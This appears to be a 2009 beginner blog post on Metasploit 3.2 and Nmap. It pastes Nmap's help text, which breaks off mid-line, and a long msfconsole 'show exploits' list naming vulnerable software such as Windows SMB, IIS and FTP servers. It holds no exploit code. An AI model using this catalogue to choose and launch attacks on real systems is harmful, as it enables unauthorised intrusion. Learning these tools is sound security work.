Black_Cane: Metasploit

Never be proud of what you have achieved; above the sky there is still more sky.

Saturday, 31 October 2009

Metasploit

Hello everyone,
I hope today is even better. Thanks for dropping by my blog.

An explanation of Metasploit ------> here we go ---->
Before I explain how to use Metasploit 3.2 (the current release at the time of writing) together with Nmap (used to scan for open ports), a few words.
If you don't know yet what Metasploit is for, go ask Grandpa Google.
Please don't misuse this for anything shady; treat it as learning/knowledge and so on. The main thing is not to harm anyone else. Thank you.
If you're already familiar with Metasploit, feel free to look around at the other tutorials on this blog; maybe there's one you haven't tried yet. If you've done them all, thanks. Enough chatter.......

OK, let's continue. Straight to the point.....
First get your coffee + cigarettes ready..... (any brand, as long as it makes smoke; an exhaust pipe works too, if that's your thing).

Next,
install Metasploit first.... if you already have the software, fine; if you don't:....... here's the site (http://www.metasploit.com). Download it first, it's only 36.7 MB.
OK,......
Once it's installed, the application usually launches on its own.
Before that, open cmd (the DOS prompt) so we can look for open ports, using Nmap.

Here's an example........ Running nmap with no arguments, as below, only prints its usage summary; to actually scan a host you give it a target and the options you want (for instance the -sS and -sV flags listed under SCAN TECHNIQUES and SERVICE/VERSION DETECTION).
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\By_dit>nmap
Nmap 4.76 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <inputfilename>: Input from list of hosts/networks
  -iR <num hosts>: Choose random targets
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
  -sL: List Scan - simply list targets to scan
  -sP: Ping Scan - go no further than determining if host is online
  -PN: Treat all hosts as online -- skip host discovery
  -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
  -PO [protocol list]: IP Protocol Ping
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
  --system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
  --scanflags <flags>: Customize TCP scan flags
  -sI <zombie host[:probeport]>: Idle scan
  -sO: IP protocol scan
  -b <FTP relay host>: FTP bounce scan
  --traceroute: Trace hop path to each host
  --reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
    Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  -F: Fast mode - Scan fewer ports than the default scan
  -r: Scan ports consecutively - don't randomize
  --top-ports <number>: Scan <number> most common ports
  --port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
  --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
  --script-trace: Show all data sent and received
  --script-updatedb: Update the script database.
OS DETECTION:
  -O: Enable OS detection
  --osscan-limit: Limit OS detection to promising targets
  --osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
  Options which take

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
       =[ 99 aux

msf > show exploits

Exploits
========

   Name  Description
   ----  -----------
   bsdi/softcart/mercantec_softcart  Mercantec SoftCart CGI Overflow
   freebsd/tacacs/xtacacsd_report  XTACACSD <= 4.1.2 report() Buffer Overflow
   hpux/lpd/cleanup_exec  HP-UX LPD Command Execution
   irix/lpd/tagprinter_exec  Irix LPD tagprinter Command Execution
   linux/games/ut2004_secure  Unreal Tournament 2004 "secure" Overflow (Linux)
   linux/http/gpsd_format_string  Berlios GPSD Format String Vulnerability
   linux/http/linksys_apply_cgi  Linksys apply.cgi buffer overflow
   linux/http/peercast_url  PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
   linux/ids/snortbopre  Snort Back Orifice Pre-Preprocessor Remote Exploit
   linux/imap/imap_uw_lsub  UoW IMAP server LSUB Buffer Overflow
   linux/madwifi/madwifi_giwscan_cb  Madwifi SIOCGIWSCAN Buffer Overflow
   linux/misc/gld_postfix  GLD (Greylisting Daemon) Postfix Buffer Overflow
   linux/misc/ib_inet_connect  Borland InterBase INET_connect() Buffer Overflow
   linux/misc/ib_jrd8_create_database  Borland InterBase jrd8_create_database() Buffer Overflow
   linux/misc/ib_open_marker_file  Borland InterBase open_marker_file() Buffer Overflow
   linux/misc/ib_pwd_db_aliased  Borland InterBase PWD_db_aliased() Buffer Overflow
   linux/mysql/mysql_yassl  MySQL yaSSL SSL Hello Message Buffer Overflow
   linux/pptp/poptop_negative_read  Poptop Negative Read Overflow
   linux/proxy/squid_ntlm_authenticate  Squid NTLM Authenticate Overflow
   linux/samba/lsa_transnames_heap  Samba lsa_io_trans_names Heap Overflow
   multi/browser/firefox_queryinterface  Firefox location.QueryInterface() Code Execution
   multi/browser/mozilla_compareto  Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
   multi/browser/mozilla_navigatorjava  Mozilla Suite/Firefox Navigator Object Code Execution
   multi/browser/qtjava_pointer  Apple QTJava toQTPointer() Arbitrary Memory Access
   multi/handler  Generic Payload Handler
   multi/misc/openview_omniback_exec  HP OpenView OmniBack II Command Execution
   multi/misc/veritas_netbackup_cmdexec  VERITAS NetBackup Remote Command Execution
   multi/ntp/ntp_overflow  NTP daemon readvar Buffer Overflow
   multi/php/php_unserialize_zval_cookie  PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
   multi/realserver/describe  RealServer Describe Buffer Overflow
   multi/samba/nttrans  Samba nttrans Overflow
   multi/svn/svnserve_date  Subversion Date Svnserve
   netware/smb/lsass_cifs  Novell NetWare LSASS CIFS.NLM Driver Stack Overflow
   osx/afp/loginext  AppleFileServer LoginExt PathName Overflow
   osx/arkeia/type77  Arkeia Backup Client Type 77 Overflow (Mac OS X)
   osx/armle/safari_libtiff  iPhone MobileSafari LibTIFF Buffer Overflow
   osx/browser/safari_libtiff  iPhone MobileSafari LibTIFF Buffer Overflow
   osx/browser/safari_metadata_archive  Safari Archive Metadata Command Execution
   osx/browser/software_update  Apple OS X Software Update Command Execution
   osx/email/mailapp_image_exec  Mail.app Image Attachment Command Execution
   osx/email/mobilemail_libtiff  iPhone MobileMail LibTIFF Buffer Overflow
   osx/ftp/webstar_ftp_user  WebSTAR FTP Server USER Overflow
   osx/samba/lsa_transnames_heap  Samba lsa_io_trans_names Heap Overflow
   osx/samba/trans2open  Samba trans2open Overflow (Mac OS X)
   solaris/dtspcd/heap_noir  Solaris dtspcd Heap Overflow
   solaris/lpd/sendmail_exec  Solaris LPD Command Execution
   solaris/samba/lsa_transnames_heap  Samba lsa_io_trans_names Heap Overflow
   solaris/samba/trans2open  Samba trans2open Overflow (Solaris SPARC)
   solaris/sunrpc/sadmind_adm_build_path  Sun Solaris sadmind adm_build_path() Buffer Overflow
   solaris/sunrpc/sadmind_exec  Solaris sadmind Command Execution
   solaris/sunrpc/ypupdated_exec  Solaris ypupdated Command Execution
   solaris/telnet/fuser  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   solaris/telnet/ttyprompt  Solaris in.telnetd TTYPROMPT Buffer Overflow
   test/aggressive  Internal Aggressive Test Exploit
   test/exploitme  MIPS Aggressive Test Exploit
   test/kernel  Internal Kernel-mode Test Exploit
   unix/misc/distcc_exec  DistCC Daemon Command Execution
   unix/misc/spamassassin_exec  SpamAssassin spamd Remote Command Execution
   unix/smtp/clamav_milter_blackhole  ClamAV Milter Blackhole-Mode Remote Code Execution
   unix/webapp/awstats_configdir_exec  AWStats configdir Remote Command Execution
   unix/webapp/barracuda_img_exec  Barracuda IMG.PL Remote Command Execution
   unix/webapp/cacti_graphimage_exec  Cacti graph_view.php Remote Command Execution
   unix/webapp/google_proxystylesheet_exec  Google Appliance ProxyStyleSheet Command Execution
   unix/webapp/guestbook_ssi_exec  Matt Wright guestbook.pl Arbitrary Command Execution
   unix/webapp/openview_connectednodes_exec  HP Openview connectedNodes.ovpl Remote Command Execution
   unix/webapp/pajax_remote_exec  PAJAX Remote Command Execution
   unix/webapp/php_eval  Generic PHP Code eval
   unix/webapp/php_include  PHP Include Generic Exploit
   unix/webapp/php_vbulletin_template  vBulletin misc.php Template Name Arbitrary Code Execution
   unix/webapp/php_wordpress_lastpost  WordPress cache_lastpostdate Arbitrary Code Execution
   unix/webapp/php_xmlrpc_eval  PHP XML-RPC Arbitrary Code Execution
   unix/webapp/phpbb_highlight  phpBB viewtopic.php Arbitrary Code Execution
   unix/webapp/sphpblog_file_upload  Simple PHP Blog <= 0.4.0 Remote Command Execution
   unix/webapp/squirrelmail_pgp_plugin  SquirrelMail PGP Plugin command execution (SMTP)
   windows/antivirus/symantec_rtvscan  Symantec Remote Management Buffer Overflow
   windows/antivirus/trendmicro_serverprotect  Trend Micro ServerProtect 5.58 Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_createbinding  Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_earthagent  Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
   windows/arkeia/type77  Arkeia Backup Client Type 77 Overflow (Win32)
   windows/backupexec/name_service  Veritas Backup Exec Name Service Overflow
   windows/backupexec/remote_agent  Veritas Backup Exec Windows Remote Agent Overflow
   windows/brightstor/discovery_tcp  CA BrightStor Discovery Service TCP Overflow
   windows/brightstor/discovery_udp  CA BrightStor Discovery Service Overflow
   windows/brightstor/etrust_itm_alert  Computer Associates Alert Notification Buffer Overflow
   windows/brightstor/hsmserver  CA BrightStor HSM Buffer Overflow
   windows/brightstor/lgserver  CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_rxrlogin  CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_rxsuselicenseini  CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/mediasrv_sunrpc  CA BrightStor ArcServe Media Service Stack Overflow
   windows/brightstor/message_engine  CA BrightStor ARCserve Message Engine Buffer Overflow
   windows/brightstor/message_engine_heap  CA BrightStor ARCserve Message Engine Heap Overflow
   windows/brightstor/sql_agent  CA BrightStor Agent for Microsoft SQL Overflow
   windows/brightstor/tape_engine  CA BrightStor ARCserve Tape Engine Buffer Overflow
   windows/brightstor/universal_agent  CA BrightStor Universal Agent Overflow
   windows/browser/aim_goaway  AOL Instant Messenger goaway Overflow
   windows/browser/ani_loadimage_chunksize  Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
   windows/browser/apple_itunes_playlist  Apple ITunes 4.7 Playlist Buffer Overflow
   windows/browser/apple_quicktime_rtsp  Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   windows/browser/ask_shortformat  Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
   windows/browser/bearshare_setformatlikesample  BearShare 6 ActiveX Control Buffer Overflow
   windows/browser/creative_software_cachefolder  Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
   windows/browser/enjoysapgui_preparetoposthtml  EnjoySAP SAP GUI ActiveX Control Buffer Overflow
   windows/browser/facebook_extractiptc  Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
   windows/browser/gom_openurl  GOM Player ActiveX Control Buffer Overflow
   windows/browser/hploadrunner  HP LoadRunner 9.0 ActiveX Buffer Overflow
   windows/browser/hpmqc_progcolor  HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
   windows/browser/ibmlotusdomino_dwa_uploadmodule  IBM Lotus Domino Web Access Upload Module Buffer Overflow
   windows/browser/ie_createobject  Internet Explorer COM CreateObject Code Execution
   windows/browser/ie_iscomponentinstalled  Internet Explorer isComponentInstalled Overflow
   windows/browser/kazaa_altnet_heap  Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
   windows/browser/logitechvideocall_start  Logitech VideoCall ActiveX Control Buffer Overflow
   windows/browser/lpviewer_url  iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
   windows/browser/macrovision_downloadandexecute  Macrovision InstallShield Update Service Buffer Overflow
   windows/browser/macrovision_unsafe  Macrovision InstallShield Update Service ActiveX Unsafe Method
   windows/browser/mcafee_mcsubmgr_vsprintf  McAfee Subscription Manager Stack Overflow
   windows/browser/mcafeevisualtrace_tracetarget  McAfee Visual Trace ActiveX Control Buffer Overflow
   windows/browser/mirc_irc_url  mIRC IRC URL Buffer Overflow
   windows/browser/ms03_020_ie_objecttype  MS03-020 Internet Explorer Object Type
   windows/browser/ms06_001_wmf_setabortproc  Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
   windows/browser/ms06_013_createtextrange  Internet Explorer createTextRange() Code Execution
   windows/browser/ms06_055_vml_method  Internet Explorer VML Fill Method Code Execution
   windows/browser/ms06_057_webview_setslice  Internet Explorer WebViewFolderIcon setSlice() Overflow
   windows/browser/ms06_067_keyframe  Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
   windows/browser/ms06_071_xml_core  Internet Explorer XML Core Services HTTP Request Handling
   windows/browser/ms08_041_snapshotviewer  Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
   windows/browser/ms08_053_mediaencoder  Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
   windows/browser/nis2004_get  Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
   windows/browser/novelliprint_executerequest  Novell iPrint Client ActiveX Control Buffer Overflow
   windows/browser/novelliprint_getdriversettings  Novell iPrint Client ActiveX Control Buffer Overflow
   windows/browser/realplayer_console  RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
   windows/browser/realplayer_import  RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
   windows/browser/realplayer_smil  RealNetworks RealPlayer SMIL Buffer Overflow
   windows/browser/softartisans_getdrivename  SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
   windows/browser/sonicwall_addrouteentry  SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
   windows/browser/symantec_backupexec_pvcalendar  Symantec BackupExec Calendar Control Buffer Overflow
   windows/browser/systemrequirementslab_unsafe  Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
   windows/browser/trendmicro_officescan  Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
   windows/browser/tumbleweed_filetransfer  Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
   windows/browser/winamp_playlist_unc  Winamp Playlist UNC Path Computer Name Overflow
   windows/browser/winamp_ultravox  Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
   windows/browser/windvd7_applicationtype  WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
   windows/browser/xmplay_asx  XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
   windows/browser/yahoomessenger_fvcom  Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
   windows/browser/yahoomessenger_server  Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
   windows/browser/zenturiprogramchecker_unsafe  Zenturi ProgramChecker ActiveX Control Arbitrary File Download.
   windows/dcerpc/ms03_026_dcom  Microsoft RPC DCOM Interface Overflow
   windows/dcerpc/ms05_017_msmq  Microsoft Message Queueing Service Path Overflow
   windows/dcerpc/ms07_065_msmq  Microsoft Message Queueing Service DNS Name Path Overflow
   windows/dcerpc/msdns_zonename  Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
   windows/driver/broadcom_wifi_ssid  Broadcom Wireless Driver Probe Response SSID Overflow
   windows/driver/dlink_wifi_rates  D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
   windows/driver/netgear_wg111_beacon  NetGear WG111v2 Wireless Driver Long Beacon Overflow
   windows/email/ani_loadimage_chunksize  Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)
   windows/emc/alphastor_agent  EMC AlphaStor Agent Buffer Overflow
   windows/firewall/blackice_pam_icq  ISS PAM.dll ICQ Parser Buffer Overflow
   windows/firewall/kerio_auth  Kerio Firewall 2.1.4 Authentication Packet Overflow
   windows/ftp/3cdaemon_ftp_user  3Com 3CDaemon 2.0 FTP Username Overflow
   windows/ftp/cesarftp_mkd  Cesar FTP 0.99g MKD Command Buffer Overflow
   windows/ftp/dreamftp_format  BolinTech Dream FTP Server 1.02 Format String
   windows/ftp/easyfilesharing_pass  Easy File Sharing FTP Server 2.0 PASS Overflow
   windows/ftp/filecopa_list_overflow  FileCopa FTP Server pre 18 Jul Version
   windows/ftp/freeftpd_key_exchange  FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
   windows/ftp/freeftpd_user  freeFTPd 1.0 Username Overflow
   windows/ftp/globalscapeftp_input  GlobalSCAPE Secure FTP Server Input Overflow
   windows/ftp/leapftp_pasv_reply  LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
   windows/ftp/netterm_netftpd_user  NetTerm NetFTPD USER Buffer Overflow
   windows/ftp/oracle9i_xdb_ftp_pass  Oracle 9i XDB FTP PASS Overflow (win32)
   windows/ftp/oracle9i_xdb_ftp_unlock  Oracle 9i XDB FTP UNLOCK Overflow (win32)
   windows/ftp/sami_ftpd_user  KarjaSoft Sami FTP Server v2.02 USER Overflow
   windows/ftp/sasser_ftpd_port  Sasser Worm avserve FTP PORT Buffer Overflow
   windows/ftp/servu_mdtm  Serv-U FTPD MDTM Overflow
   windows/ftp/slimftpd_list_concat  SlimFTPd LIST Concatenation Overflow
   windows/ftp/warftpd_165_pass  War-FTPD 1.65 Password Overflow
   windows/ftp/warftpd_165_user  War-FTPD 1.65 Username Overflow
   windows/ftp/wftpd_size  Texas Imperial Software WFTPD 3.23 SIZE Overflow
   windows/ftp/wsftp_server_503_mkd  WS-FTP Server 5.03 MKD Overflow
   windows/ftp/wsftp_server_505_xmd5  Ipswitch WS_FTP Server 5.05 XMD5 Overflow
   windows/games/mohaa_getinfo  Medal Of Honor Allied Assault getinfo Stack Overflow
   windows/games/ut2004_secure  Unreal Tournament 2004 "secure" Overflow (Win32)
   windows/http/altn_webadmin  Alt-N WebAdmin USER Buffer Overflow
   windows/http/apache_chunked  Apache Win32 Chunked Encoding
   windows/http/apache_modjk_overflow  Apache mod_jk 1.2.20 Buffer Overflow
   windows/http/badblue_ext_overflow  BadBlue 2.5 EXT.dll Buffer Overflow
   windows/http/badblue_passthru  BadBlue 2.72b PassThru Buffer Overflow
   windows/http/bea_weblogic_transfer_encoding  BEA Weblogic Transfer-Encoding Buffer Overflow
   windows/http/ca_igateway_debug  CA iTechnology iGateway Debug Mode Buffer Overflow
   windows/http/edirectory_host  Novell eDirectory NDS Server Host Header Overflow
   windows/http/edirectory_imonitor  eDirectory 8.7.3 iMonitor Remote Stack Overflow
   windows/http/hp_nnm  HP OpenView Network Node Manager CGI Buffer Overflow
   windows/http/ia_webmail  IA WebMail 3.x Buffer Overflow
   windows/http/ibm_tpmfosd_overflow  IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
   windows/http/ibm_tsm_cad  IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
   windows/http/icecast_header  Icecast (<= 2.0.1) Header Overwrite (win32)
   windows/http/ipswitch_wug_maincfgret  Ipswitch WhatsUp Gold 8.03 Buffer Overflow
   windows/http/mailenable_auth_header  MailEnable Authorization Header Buffer Overflow
   windows/http/maxdb_webdbm_database  MaxDB WebDBM Database Parameter Overflow
   windows/http/maxdb_webdbm_get_overflow  MaxDB WebDBM GET Buffer Overflow
   windows/http/mcafee_epolicy_source  McAfee ePolicy Orchestrator / ProtectionPilot Overflow
   windows/http/minishare_get_overflow  Minishare 1.4.1 Buffer Overflow
   windows/http/navicopa_get_overflow  NaviCOPA 2.0.1 URL Handling Buffer Overflow
   windows/http/novell_messenger_acceptlang  Novell Messenger Server 2.0 Accept-Language Overflow
   windows/http/nowsms  Now SMS/MMS Gateway Buffer Overflow
   windows/http/oracle9i_xdb_pass  Oracle 9i XDB HTTP PASS Overflow (win32)
   windows/http/peercast_url  PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
   windows/http/privatewire_gateway  Private Wire Gateway Buffer Overflow
   windows/http/psoproxy91_overflow  PSO Proxy v0.91 Stack Overflow
   windows/http/sapdb_webtools  SAP DB 7.4 WebTools Buffer Overflow
   windows/http/savant_31_overflow  Savant 3.1 Web Server Overflow
   windows/http/shoutcast_format  SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
   windows/http/shttpd_post  SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
   windows/http/sybase_easerver  Sybase EAServer 5.2 Remote Stack Overflow
   windows/http/trackercam_phparg_overflow  TrackerCam PHP Argument Buffer Overflow
   windows/http/trendmicro_officescan  Trend Micro OfficeScan Remote Stack Overflow
   windows/http/xitami_if_mod_since  Xitami 2.5c2 Web Server If-Modified-Since Overflow
   windows/iis/ms01_023_printer  Microsoft IIS 5.0 Printer Host Header Overflow
   windows/iis/ms01_033_idq  Microsoft IIS 5.0 IDQ Path Overflow
   windows/iis/ms02_018_htr  Microsoft IIS 4.0 .HTR Path Overflow
   windows/iis/ms03_007_ntdll_webdav  Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   windows/imap/eudora_list  Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
   windows/imap/imail_delete  IMail IMAP4D Delete Overflow
   windows/imap/ipswitch_search  Ipswitch IMail IMAP SEARCH Buffer Overflow
   windows/imap/mailenable_login  MailEnable IMAPD (2.35) Login Request Buffer Overflow
   windows/imap/mailenable_status  MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
   windows/imap/mailenable_w3c_select  MailEnable IMAPD W3C Logging Buffer Overflow
   windows/imap/mdaemon_cram_md5  Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
   windows/imap/mdaemon_fetch  MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
   windows/imap/mercur_imap_select_overflow  Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
   windows/imap/mercur_login  Mercur Messaging 2005 IMAP Login Buffer Overflow
   windows/imap/mercury_login  Mercury/32 <= 4.01b LOGIN Buffer Overflow
   windows/imap/mercury_rename  Mercury/32 v4.01a IMAP RENAME Buffer Overflow
   windows/imap/novell_netmail_append  Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
   windows/imap/novell_netmail_auth  Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
   windows/imap/novell_netmail_status  Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
   windows/imap/novell_netmail_subscribe  Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
   windows/isapi/fp30reg_chunked  Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
   windows/isapi/ms00_094_pbserver  Microsoft IIS Phone Book Service Overflow
   windows/isapi/nsiislog_post  Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
   windows/isapi/rsa_webagent_redirect  Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
   windows/isapi/w3who_query  Microsoft IIS ISAPI w3who.dll Query String Overflow
   windows/ldap/imail_thc  IMail LDAP Service Buffer Overflow
   windows/license/sentinel_lm7_udp  SentinelLM UDP Buffer Overflow
   windows/lotus/domino_sametime_stmux  Lotus Domino Sametime STMux.exe Stack Overflow
   windows/lpd/hummingbird_exceed  Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
   windows/lpd/niprint  NIPrint LPD Request Overflow
   windows/lpd/saplpd  SAP SAPLPD 6.28 Buffer Overflow
   windows/lpd/wincomlpd_admin  WinComLPD <= 3.0.2 Buffer Overflow
   windows/misc/apple_quicktime_rtsp_response  Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
   windows/misc/asus_dpcproxy_overflow  Asus Dpcproxy Buffer Overflow
   windows/misc/bakbone_netvault_heap  BakBone NetVault Remote Heap Overflow
   windows/misc/bigant_server  BigAnt Server 2.2 Buffer Overflow
   windows/misc/bomberclone_overflow  Bomberclone 0.11.6 Buffer Overflow
   windows/misc/borland_interbase  Borland Interbase Create-Request Buffer Overflow
   windows/misc/borland_starteam  Borland CaliberRM StarTeam Multicast Service Buffer Overflow
   windows/misc/doubletake  DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
   windows/misc/eiqnetworks_esa  eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
   windows/misc/eiqnetworks_esa_topology  eIQNetworks ESA Topology DELETEDEVICE Overflow
   windows/misc/fb_isc_attach_database  Firebird Relational Database isc_attach_database() Buffer Overflow
   windows/misc/fb_isc_create_database  Firebird Relational Database isc_create_database() Buffer Overflow
   windows/misc/fb_svc_attach  Firebird Relational Database SVC_attach() Buffer Overflow
   windows/misc/hp_ovtrace  HP OpenView Operations OVTrace Buffer Overflow
   windows/misc/ib_isc_attach_database  Borland InterBase isc_attach_database() Buffer Overflow
   windows/misc/ib_isc_create_database  Borland InterBase isc_create_database() Buffer Overflow
   windows/misc/ib_svc_attach  Borland InterBase SVC_attach() Buffer Overflow
   windows/misc/landesk_aolnsrvr  LANDesk Management Suite 8.7 Alert Service Buffer Overflow
   windows/misc/mercury_phonebook  Mercury/32 <= v4.01b PH Server Module Buffer Overflow
   windows/misc/ms07_064_sami  Microsoft DirectX DirectShow SAMI Buffer Overflow
   windows/misc/netcat110_nt  Netcat v1.10 NT Stack Overflow
   windows/misc/shixxnote_font  ShixxNOTE 6.net Font Field Overflow
   windows/misc/tiny_identd_overflow  TinyIdentD 2.2 Stack Overflow
   windows/misc/windows_rsh  Windows RSH daemon Buffer Overflow
   windows/mssql/ms02_039_slammer  Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello  Microsoft SQL Server Hello Overflow
   windows/mysql/mysql_yassl  MySQL yaSSL SSL Hello Message Buffer Overflow
   windows/nntp/ms05_030_nntp  Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
   windows/novell/groupwisemessenger_client  Novell GroupWise Messenger Client Buffer Overflow
   windows/novell/nmap_stor  Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
   windows/novell/zenworks_desktop_agent  Novell ZENworks 6.5 Desktop/Server Management Overflow
   windows/pop3/seattlelab_pass  Seattle Lab Mail 5.5 POP3 Buffer Overflow
   windows/proxy/bluecoat_winproxy_host  Blue Coat WinProxy Host Header Overflow
   windows/proxy/ccproxy_telnet_ping  CCProxy <= v6.2 Telnet Proxy Ping Overflow
   windows/proxy/proxypro_http_get  Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
   windows/scada/realwin  DATAC RealWin SCADA Server Buffer Overflow
   windows/sip/aim_triton_cseq  AIM Triton 1.0.4 CSeq Buffer Overflow
   windows/sip/sipxezphone_cseq  SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
   windows/sip/sipxphone_cseq  SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
   windows/smb/ms03_049_netapi  Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms04_007_killbill  Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms04_011_lsass  Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms04_031_netdde  Microsoft NetDDE Service Overflow
   windows/smb/ms05_039_pnp  Microsoft Plug and Play Service Overflow
   windows/smb/ms06_025_rasmans_reg  Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_025_rras  Microsoft RRAS Service Overflow
   windows/smb/ms06_040_netapi  Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_066_nwapi  Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms06_066_nwwks  Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms08_067_netapi  Microsoft Server Service Relative Path Stack Corruption
   windows/smb/msdns_zonename  Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/psexec  Microsoft Windows Authenticated User Code Execution
   windows/smb/smb_relay  Microsoft Windows SMB Relay Code Execution
   windows/smtp/mailcarrier_smtp_ehlo  TABS MailCarrier v2.51 SMTP EHLO Overflow
   windows/smtp/mercury_cram_md5  Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
   windows/smtp/wmailserver  SoftiaCom WMailserver 1.0 Buffer Overflow
   windows/smtp/ypops_overflow1  YPOPS 0.6 Buffer Overflow
   windows/ssh/freesshd_key_exchange  FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
   windows/ssh/putty_msg_debug  PuTTy.exe <= v0.53 Buffer Overflow
   windows/ssh/securecrt_ssh1  SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
   windows/ssl/ms04_011_pct  Microsoft Private Communications Transport Overflow
   windows/telnet/gamsoft_telsrv_username  GAMSoft TelSrv 1.5 Username Buffer Overflow
   windows/telnet/goodtech_telnet  GoodTech Telnet Server <= 5.0.6 Buffer Overflow
